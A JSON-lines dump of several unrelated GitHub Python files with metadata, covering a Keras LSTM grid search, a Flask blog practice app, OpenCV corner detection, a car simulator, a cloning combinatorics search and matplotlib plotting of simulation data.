regressor.add(Dense(units=1))\n \n regressor.compile(optimizer=optimizer, loss='mean_squared_error')\n \n return regressor\n\nregressor = KerasClassifier(build_fn=build_classifier)\nparameters = {'batch_size': [25, 32],\n 'epochs': [100, 500],\n 'optimizer': ['adam', 'rmsprop']\n }\ngrid_search = GridSearchCV(estimator=regressor,\n param_grid=parameters,\n scoring='neg_mean_squared_error',\n cv=10)\ngrid_search = grid_search.fit(X_train, y_train) \n\nbest_parameters = grid_search.best_estimator_\nbest_accuracy = grid_search.best_score_\n\n\n\n\n\n\n\n\n\n\n\n", "repo_name": "igobarros/Curso-Udemy-Deep-Learning_AZ", "sub_path": "Volume 1 - Supervised Deep Learning/Part 3 - Recurrent Neural Networks (RNN)/Section 12 - Building a RNN/rnn.py", "file_name": "rnn.py", "file_ext": "py", "file_size_in_byte": 6436, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.read_csv", "line_number": 12, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 27, "usage_type": "call"}, {"api_name": "keras.models.Sequential", "line_number": 38, "usage_type": "call"}, 
{"api_name": "keras.layers.LSTM", "line_number": 41, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 42, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 45, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 46, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 49, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 50, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 53, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 54, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 57, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 58, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 61, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 62, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 65, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 77, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 90, "usage_type": "call"}, {"api_name": "seaborn.set_style", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 109, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 109, "usage_type": "call"}, {"api_name": "keras.models.Sequential", "line_number": 144, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 145, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 146, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 148, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 149, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 151, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 152, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 154, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 155, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 157, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 158, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", 
"line_number": 160, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 161, "usage_type": "call"}, {"api_name": "keras.wrappers.scikit_learn.KerasClassifier", "line_number": 167, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 172, "usage_type": "call"}]}
+{"seq_id": "42546103225", "text": "#all the imports\nfrom __future__ import with_statement\nfrom contextlib import closing\nimport sqlite3\nfrom flask import Flask, request, session, g, redirect, url_for, abort, render_template, flash\n\n\n# configuration\nDATABASE = 'flaskr.db'\nDEBUG = True\nSECRET_KEY = 'development key'\nUSERNAME = 'admin'\nPASSWORD = 'default'\n\n# create our littel application\napp = Flask(__name__)\napp.config.from_object(__name__)\n# app.config.from_envvar('FLASKR_SETTINGS' silent=True)\n\n\ndef connect_db():\n return sqlite3.connect(app.config['DATABASE'])\n\n\ndef init_db():\n with closing(connect_db()) as db:\n with app.open_resource('schema.sql') as f:\n db.cursor().executescript(f.read().decode())\n db.commit()\n\n\n@app.before_request\ndef before_request():\n g.db = connect_db()\n\n\n@app.teardown_request\ndef teardwon_request(exception):\n g.db.close()\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef show_entries():\n cur = g.db.execute('select title, text, id from entries order by id desc')\n entries = [dict(title=row[0], text=row[1], id=row[2]) for row in cur.fetchall()]\n\n result = {'entries': entries}\n\n #mode = 0:add, 1:edit\n mode = 0\n\n if request.method == 'POST':\n result['origin_title'] = request.form['origin_title']\n result['origin_text'] = request.form['origin_text']\n result['id'] = request.form['id']\n mode = 1\n flash('EDIT MODE')\n\n result['mode'] = mode\n\n return render_template('show_entries.html', result=result)\n\n\n@app.route('/add', methods=['POST'])\ndef add_entry():\n if not session.get('logged_in'): # session['logged_in']\n abort(401)\n g.db.execute('insert into entries (title, text) values(?, ?)', [request.form['title'], request.form['text']])\n g.db.commit()\n flash('New entry was successfully posted')\n return redirect(url_for('show_entries'))\n\n\n@app.route('/edit', methods=['POST'])\ndef edit_entry():\n if not session.get('logged_in'):\n abort(401)\n g.db.execute('update entries set title = ?, text = ? 
where id = ?', [request.form['title'], request.form['text'], request.form['id']])\n g.db.commit()\n flash('successfully edit no.'+request.form['id'])\n return redirect(url_for('show_entries'))\n\n\n@app.route('/del', methods=['POST'])\ndef del_entry():\n if not session.get('logged_in'):\n abort(401)\n g.db.execute('delete from entries where id = ?', [request.form['id']])\n g.db.commit()\n flash('successfully delete no.'+request.form['id'])\n return redirect(url_for('show_entries'))\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n error = None\n if request.method == 'POST':\n if request.form['username'] != app.config['USERNAME']:\n error = 'Invalid username'\n elif request.form['password'] != app.config['PASSWORD']:\n error = 'Invalid password'\n else:\n session['logged_in'] = True\n # session.setattribute('logged_in', True)\n\n flash('You were logged in')\n return redirect(url_for('show_entries'))\n return render_template('login.html', error=error)\n\n\n@app.route('/logout')\ndef logout():\n session.pop('logged_in', None)\n\n # session['logged_in'] = None\n # del(session['logged_in'])\n flash('you were logged out')\n return redirect(url_for('show_entries'))\n\n\nif __name__ == '__main__':\n app.run()\n\n", "repo_name": "hiyee/seon", "sub_path": "practice.py", "file_name": "practice.py", "file_ext": "py", "file_size_in_byte": 3366, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "flask.Flask", "line_number": 16, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 22, "usage_type": "call"}, {"api_name": "contextlib.closing", "line_number": 26, "usage_type": "call"}, {"api_name": "flask.g.db", "line_number": 34, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.g.db.close", "line_number": 39, "usage_type": "call"}, {"api_name": "flask.g.db", "line_number": 39, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 39, "usage_type": "name"}, {"api_name": "flask.g.db.execute", "line_number": 44, "usage_type": "call"}, {"api_name": "flask.g.db", "line_number": 44, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 44, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 52, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 53, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 53, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 54, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 54, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 55, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 55, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 57, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 61, "usage_type": "call"}, {"api_name": "flask.session.get", "line_number": 66, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 66, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 67, "usage_type": "call"}, {"api_name": "flask.g.db.execute", "line_number": 68, "usage_type": "call"}, {"api_name": "flask.g.db", "line_number": 68, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 68, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 68, "usage_type": 
"attribute"}, {"api_name": "flask.request", "line_number": 68, "usage_type": "name"}, {"api_name": "flask.g.db.commit", "line_number": 69, "usage_type": "call"}, {"api_name": "flask.g.db", "line_number": 69, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 69, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 70, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 71, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 71, "usage_type": "call"}, {"api_name": "flask.session.get", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 76, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.g.db.execute", "line_number": 78, "usage_type": "call"}, {"api_name": "flask.g.db", "line_number": 78, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 78, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 78, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 78, "usage_type": "name"}, {"api_name": "flask.g.db.commit", "line_number": 79, "usage_type": "call"}, {"api_name": "flask.g.db", "line_number": 79, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 79, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 80, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 80, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 81, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 81, "usage_type": "call"}, {"api_name": "flask.session.get", "line_number": 86, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 86, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 87, "usage_type": "call"}, {"api_name": "flask.g.db.execute", "line_number": 88, "usage_type": "call"}, {"api_name": "flask.g.db", "line_number": 88, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 88, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 88, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 88, "usage_type": "name"}, {"api_name": "flask.g.db.commit", "line_number": 89, "usage_type": "call"}, {"api_name": "flask.g.db", "line_number": 89, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 89, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 90, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 90, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 90, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 91, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 91, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 97, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 97, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 98, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 98, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 100, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 100, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 103, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 106, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 107, "usage_type": "call"}, 
{"api_name": "flask.url_for", "line_number": 107, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 108, "usage_type": "call"}, {"api_name": "flask.session.pop", "line_number": 113, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 113, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 117, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 118, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 118, "usage_type": "call"}]}
+{"seq_id": "23271083091", "text": "import numpy as np\nimport cv2\n\nimg = cv2.imread('cube.jpg')\ngray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\n# get corner (x, y)\ncorners = cv2.goodFeaturesToTrack(gray, 5, 0.01, 10) # ..(img, maxCorners, qualityLevel, minDistance)\ncorners = np.int0(corners)\n\n# draw (red) points (where corners are) on Img\nfor i in corners:\n x,y = i.ravel()\n cv2.circle(img, (x,y), 3, (0, 0, 255), -1)\n\ncv2.imwrite('Detection.jpg', img)\ncv2.waitKey()\ncv2.destroyAllWindows()", "repo_name": "MrCode97/openCV", "sub_path": "Detection/Shi-Thomasi/thomasi.py", "file_name": "thomasi.py", "file_ext": "py", "file_size_in_byte": 462, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "cv2.imread", "line_number": 4, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 5, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 5, "usage_type": "attribute"}, {"api_name": "cv2.goodFeaturesToTrack", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.int0", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 18, "usage_type": "call"}]}
+{"seq_id": "1755946681", "text": "import collections\n\nimport numpy as np\n\nPoint = collections.namedtuple(\"Point\", \"x y\")\n\n\nclass GameSimulator:\n def __init__(self, game_updater):\n self.car = SimulatedCar(np.array([390, 295]), np.array([6, 0]))\n self.game_updater = game_updater\n\n def update(self, dt):\n self.game_updater.update(self.car)\n\n\ndef _rotate(deg):\n theta = np.radians(deg)\n c, s = np.cos(theta), np.sin(theta)\n return np.array([[c, -s], [s, c]])\n\n\ndef _to_point(array):\n return Point(*array)\n\n\nclass SimulatedCar:\n angle = 0\n rotation = 0\n sensor1 = Point(0, 0)\n sensor2 = Point(0, 0)\n sensor3 = Point(0, 0)\n signal1 = 0\n signal2 = 0\n signal3 = 0\n\n def __init__(self, starter_center, velocity):\n self.velocity = velocity\n self._set_pos(starter_center)\n\n def _set_pos(self, pos):\n self.pos = pos\n self.x = pos[0]\n self.y = pos[1]\n\n def move(self, rotation, game_world):\n self._set_pos(self.velocity + self.pos)\n self.rotation = rotation\n self.angle = self.angle + self.rotation\n self.sensor1 = _to_point(np.matmul(_rotate(self.angle), np.array([30, 0])) + self.pos)\n self.sensor2 = _to_point(np.matmul(_rotate((self.angle + 30) % 360), np.array([30, 0])) + self.pos)\n self.sensor3 = _to_point(np.matmul(_rotate((self.angle - 30) % 360), np.array([30, 0])) + self.pos)\n\n self.signal1 = int(np.sum(game_world.sand[int(self.sensor1.x) - 10:int(self.sensor1.x) + 10,\n int(self.sensor1.y) - 10:int(self.sensor1.y) + 10])) / 400.\n self.signal2 = int(np.sum(game_world.sand[int(self.sensor2.x) - 10:int(self.sensor2.x) + 10,\n int(self.sensor2.y) - 10:int(self.sensor2.y) + 10])) / 400.\n self.signal3 = int(np.sum(game_world.sand[int(self.sensor3.x) - 10:int(self.sensor3.x) + 10,\n int(self.sensor3.y) - 10:int(self.sensor3.y) + 10])) / 400.\n if self.sensor1.x > game_world.width - 10 or self.sensor1.x < 10 or self.sensor1.y > game_world.height - 10 or self.sensor1.y < 10:\n self.signal1 = 1.\n if self.sensor2.x > game_world.width - 10 or self.sensor2.x < 10 or self.sensor2.y > game_world.height - 10 or self.sensor2.y < 10:\n self.signal2 = 1.\n if self.sensor3.x > game_world.width - 10 or self.sensor3.x < 10 or self.sensor3.y > game_world.height - 10 or self.sensor3.y < 10:\n self.signal3 = 1.\n\n self.reposition(game_world)\n\n def reposition(self, game_world):\n x = self.x\n y = self.y\n if x < 10:\n x = 10\n if y < 10:\n y = 10\n if x > game_world.width - 10:\n x = game_world.width - 10\n if y > game_world.height - 10:\n y = game_world.height - 10\n\n self._set_pos(Point(x, y))\n", "repo_name": "maczikasz/ai-learning-projects", "sub_path": "reinforcement-learning/self-driving-car/world/simulator/game_simulator.py", "file_name": "game_simulator.py", "file_ext": "py", "file_size_in_byte": 2868, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "collections.namedtuple", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.radians", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 51, "usage_type": "call"}, {"api_name": 
"numpy.array", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 58, "usage_type": "call"}]}
+{"seq_id": "39756083728", "text": "import sys\nfrom box import Box\nfrom result import Result\nfrom utils.progressbar import ProgressBar\nfrom utils.combinations import ncr\n\nclass FindSmart:\n def __init__(self, all_clones, max_generations, minimum_score):\n self.all_clones = all_clones\n self.current_generation = 0\n self.max_generations = max_generations\n self.minimum_score = minimum_score\n self.best_score = -100\n self.best_clones = set()\n\n def _process(self, box):\n result = box.get_offspring()\n if result in self.all_clones.clones():\n return\n score = result.score()\n if score > self.best_score:\n self.best_score = score\n self.best_clones = set()\n if score == self.best_score:\n resultBox = Result(result, box)\n self.best_clones.add(resultBox)\n if (score == 30) or \\\n (score >= self.minimum_score and \\\n self.current_generation < self.max_generations):\n self.all_clones.add_clone(result)\n\n def run(self):\n while self.current_generation < self.max_generations:\n self.current_generation += 1\n self._generation()\n\n def _generation(self):\n clones = list(self.all_clones.clones())\n num_clones = len(clones)\n pb = ProgressBar(ncr(num_clones, 4) + ncr(num_clones, 3))\n sys.stderr.write(\"Starting generation {} with {} clones\\n\".format(self.current_generation, num_clones))\n for i in range(num_clones):\n for j in range(i+1, num_clones):\n for k in range(j+1, num_clones):\n for l in range(k+1, num_clones):\n box = Box([clones[i], clones[j], clones[k], clones[l]], self.current_generation)\n self._process(box)\n pb.increment()\n\n for i in range(num_clones):\n for j in range(i+1, num_clones):\n for k in range(j+1, num_clones):\n clone1 = clones[i]\n clone2 = clones[j]\n clone3 = clones[k]\n box = Box([clones[i], clones[j], clones[k]], self.current_generation)\n self._process(box)\n pb.increment()\n pb.clear()\n\n def print(self):\n sorted_clones = sorted(list(self.best_clones), key=lambda result: (result.get_clone().yield_count(), result.get_box().get_size()))\n for result in sorted_clones:\n result.print()\n", "repo_name": "thagorn/rust_cloning", "sub_path": "algorithms/find_smart.py", "file_name": "find_smart.py", "file_ext": "py", "file_size_in_byte": 2504, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "box.get_offspring", "line_number": 17, "usage_type": "call"}, {"api_name": "result.score", "line_number": 20, "usage_type": "call"}, {"api_name": "result.Result", "line_number": 25, "usage_type": "call"}, {"api_name": "utils.progressbar.ProgressBar", "line_number": 40, "usage_type": "call"}, {"api_name": "utils.combinations.ncr", "line_number": 40, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 41, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 41, "usage_type": "attribute"}, {"api_name": "box.Box", "line_number": 46, "usage_type": "call"}, {"api_name": "box.Box", "line_number": 56, "usage_type": "call"}, {"api_name": "result.get_clone", "line_number": 62, "usage_type": "call"}, {"api_name": "result.get_box", "line_number": 62, "usage_type": "call"}, {"api_name": "result.print", "line_number": 64, "usage_type": "call"}]}
+{"seq_id": "42663930517", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport pickle\nfrom scipy.optimize import curve_fit\n\nwith open(r\"continuous delta model/data.pkl\", \"rb\") as f:\n t, evolution_of_E, evolution_of_nactive, fluctuation_E, fluctuation_nactive, time_to_reach_AS = pickle.load(f)\n \nphi = np.array([0.1495, 0.1496, 0.1497, 0.1498, 0.1499, 0.15 , 0.1501, 0.1502,\n 0.1503, 0.1504, 0.1505, 0.1506, 0.1507, 0.1508, 0.1509, 0.151 ,\n 0.1511, 0.1512, 0.1513, 0.1514, 0.1515, 0.1516, 0.1517, 0.1518,\n 0.1519, 0.152 , 0.1521, 0.1522, 0.1523, 0.1524, 0.1525, 0.1526,\n 0.1527, 0.1528, 0.1529, 0.153 ])\n\nN = np.array([10000, 10769, 11538, 12307, 13076, 13846, 14615, 15384, 16153,\n 16923, 17692, 18461, 19230, 20000, 20769, 21538, 22307, 23076,\n 23846, 24615, 25384, 26153, 26923, 27692, 28461, 29230, 30000])\n\nplt.figure()\nnum = -4\nfor i in range(0, len(phi) - 10, 2):\n plt.plot(t, evolution_of_nactive[i, num], label = phi[i])\nplt.xlabel(\"time, did I have once good units for time? No..\")\nplt.ylabel(\"n. of active particles\")\nplt.title(f\"N = {N[num]}\")\nplt.xscale(\"log\")\nplt.yscale(\"log\")\nplt.legend()\n\nplt.figure()\nfor i in range(0, len(N), 2):\n plt.plot(phi, time_to_reach_AS[:, i], label = f\"N = {N[i]}\")\nplt.xlabel(\"phi\")\nplt.ylabel(\"time to reach AS\")\nplt.xscale(\"log\")\nplt.yscale(\"log\")\nplt.legend()\n\n\n\nplt.figure()\nfor i in range(0, len(N) -2, 3):\n plt.subplot(121)\n plt.plot(t, evolution_of_nactive[3, i], label = N[i])\n plt.xlabel(\"time, did I have once good units for time? No..\")\n plt.ylabel(\"n. of active particles\")\n plt.title(f\"phi = {phi[18]}\")\n plt.xscale(\"log\")\n plt.yscale(\"log\")\n plt.legend()\n\n plt.subplot(122)\n plt.plot(t, evolution_of_nactive[25, i], label = N[i])\n plt.xlabel(\"time, no good units? have i ever?\")\n plt.ylabel(\"n. 
of active particles\")\n plt.title(f\"phi = {phi[25]}\")\n plt.xscale(\"log\")\n plt.yscale(\"log\")\n plt.legend()\n\nplt.figure()\nplt.imshow(time_to_reach_AS, extent = [min(N), max(N), min(phi), max(phi)], origin = 'lower', cmap = \"magma\", aspect = (np.max(N) - np.min(N))/(np.max(phi) - np.min(phi)))\nplt.xlabel(\"N\")\nplt.ylabel(r\"$\\phi$\")\nplt.title(\"time to reach ss\")\nplt.colorbar()\n\nplt.figure()\nplt.imshow(fluctuation_nactive, extent = [min(N), max(N), min(phi), max(phi)], origin = 'lower', cmap = \"magma\", aspect = (np.max(N) - np.min(N))/(np.max(phi) - np.min(phi)))\nplt.xlabel(r\"N\")\nplt.ylabel(r\"$\\phi$\")\nplt.title(r\"color = $N(\\langle \\rho_a^2\\rangle - \\langle \\rho_a\\rangle^2)$\")\nplt.colorbar()\n\nplt.figure()\nplt.imshow(fluctuation_E, extent = [min(N), max(N), min(phi), max(phi)], origin = 'lower', cmap = \"magma\", aspect = (np.max(N) - np.min(N))/(np.max(phi) - np.min(phi)))\nplt.xlabel(r\"N\")\nplt.ylabel(r\"$\\phi$\")\nplt.title(r\"color = $N(\\langle E^2\\rangle - \\langle E\\rangle^2)$\")\nplt.colorbar()\n\n\ndef linearL(x, a, b, c):\n return a - b*np.log(x - c)\n\ndef power(x,a, b, c):\n return a*(x - c)**(-b)\n\n\n\ndef critical(x, y):\n where = np.logical_not(np.isnan(y))\n a, b = curve_fit(linearL, x[where], np.log(y[where]), p0 = (-6, 1.5, 0.149))\n return a\n\nplt.figure()\nplt.plot(phi, fluctuation_nactive[:, -7])\nplt.xscale('log')\nplt.yscale(\"log\")\nplt.xlabel(r\"$\\phi$\")\nplt.ylabel(r\"variance of active particles\")\n\nplt.figure()\nplt.plot(phi, fluctuation_E[:, -7])\nplt.xscale('log')\nplt.yscale(\"log\")\nplt.xlabel(r\"$\\phi$\")\nplt.ylabel(r\"variance of energy BY particle\")\n\ncritical_arr = []\nphic = []\nplt.figure()\nfor i in range(6, 10):\n plt.plot(phi, fluctuation_nactive[:, -i], label = N[-i])\n setdata = critical(phi, fluctuation_nactive[:, -i])\n critical_arr.append(setdata[1])\n phic.append(setdata[2])\nplt.xscale('log')\nplt.yscale(\"log\")\nplt.xlabel(r\"$\\phi$\")\nplt.ylabel(r\"variance of active particles\")\nphi_c = np.mean(np.array(phic))\ncritical_val = np.mean(np.array(critical_arr))\nprint(f\"phi_c = {phi_c} and exponent = {critical_val}\")", "repo_name": "Syrocco/figures", "sub_path": "continuous delta model.py", "file_name": "continuous delta model.py", "file_ext": "py", "file_size_in_byte": 3888, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pickle.load", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xscale", "line_number": 26, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yscale", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xscale", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yscale", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", 